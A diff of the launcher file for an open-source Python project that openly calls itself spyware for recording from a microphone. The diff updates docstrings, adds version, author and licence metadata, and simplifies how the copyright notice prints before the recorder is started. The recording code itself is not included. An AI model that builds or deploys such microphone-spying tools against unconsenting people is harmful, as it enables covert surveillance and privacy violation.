@@ -1,11 +1,13 @@
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 
-""" This package a SpyWare to record from microphone. """
+"""
+This package implements a SpyWare to record from microphone.
+"""
 
 ###################
-#    This package a SpyWare to record from microphone.
-#    Copyright (C) 2021  Maurice Lambert
+#    This package implements a SpyWare to record from microphone.
+#    Copyright (C) 2021, 2022  Maurice Lambert
 
 #    This program is free software: you can redistribute it and/or modify
 #    it under the terms of the GNU General Public License as published by
@@ -21,18 +23,30 @@
 #    along with this program.  If not, see <https://www.gnu.org/licenses/>.
 ###################
 
+__version__ = "1.0.0"
+__author__ = "Maurice Lambert"
+__author_email__ = "mauricelambert434@gmail.com"
+__maintainer__ = "Maurice Lambert"
+__maintainer_email__ = "mauricelambert434@gmail.com"
+__description__ = """
+This module implements a SpyWare to record from microphone.
+"""
+license = "GPL-3.0 License"
+__url__ = "https://github.com/mauricelambert/SpyWare"
+
+copyright = """
+SpyWare  Copyright (C) 2021, 2022  Maurice Lambert
+This program comes with ABSOLUTELY NO WARRANTY.
+This is free software, and you are welcome to redistribute it
+under certain conditions.
+"""
+__license__ = license
+__copyright__ = copyright
+
 try:
     from .AudioLogger import main as audioSpy
 except ImportError:
     from AudioLogger import main as audioSpy
 
-print(
-    """
-AudioLogger  Copyright (C) 2021  Maurice Lambert
-This program comes with ABSOLUTELY NO WARRANTY.
-This is free software, and you are welcome to redistribute it
-under certain conditions.
-"""
-)
-
-audioSpy()
\ No newline at end of file
+print(copyright)
+audioSpy()
